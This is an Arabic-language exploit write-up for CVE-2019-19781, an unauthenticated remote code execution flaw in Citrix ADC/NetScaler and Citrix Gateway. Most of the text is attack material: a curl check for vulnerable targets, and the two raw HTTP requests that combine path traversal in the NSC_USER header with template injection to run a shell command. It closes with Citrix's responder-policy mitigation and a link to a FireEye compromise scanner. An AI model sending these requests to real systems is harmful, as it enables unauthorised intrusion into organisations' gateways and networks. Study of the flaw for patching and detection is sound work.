
CVE-2019-19781 - استغلال تنفيذ تعليمات برمجية عن بُعد على Citrix ADC Netscaler
تنفيذ الكود عن بُعد (RCE) في Citrix Application Delivery Controller وCitrix Gateway
تم تحديد ثغرة أمنية في Citrix Application Delivery Controller (ADC) المعروف سابقًا باسم NetScaler ADC وCitrix Gateway المعروف سابقًا باسم NetScaler Gateway، والتي، إذا تم استغلالها، قد تسمح لمهاجم غير مصادق بتنفيذ كود عشوائي.
تعديل: ماسح مؤشرات الاختراق لـ CVE-2019-19781 من Fireeye -> https://github.com/fireeye/ioc-scanner-CVE-2019-19781/
المنتجات المتأثرة:

TARGET=your_ip
curl -vk –path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep "You don’t have permission to access /vpns/" >/dev/null && echo "VULNERABLE: $TARGET" || echo "MITIGATED: $TARGET"
POST /vpn/../vpns/portal/scripts/newbm.pl
POST /vpn/../vpns/portal/scripts/rmbm.pl
GET /vpn/../vpns/portal/scripts/picktheme.pl
يلزم طلبان فقط لاستغلال هذه الثغرة دون أي مصادقة!
الطلب الأول:
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close
Content-Length: 103
url=http://exemple.com&title=[%t=template.new({'BLOCK'='print `uname -a`'})%][% t %]&desc=test&UI_inuse=RfWeb
الطلب الثاني:
GET /vpns/portal/bonclay4.xml HTTP/1.1
Host: 3.81.59.87
NSC_USER: ../../../../netscaler/portal/templates/randomletter
NSC_NONCE: c
Connection: close

enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config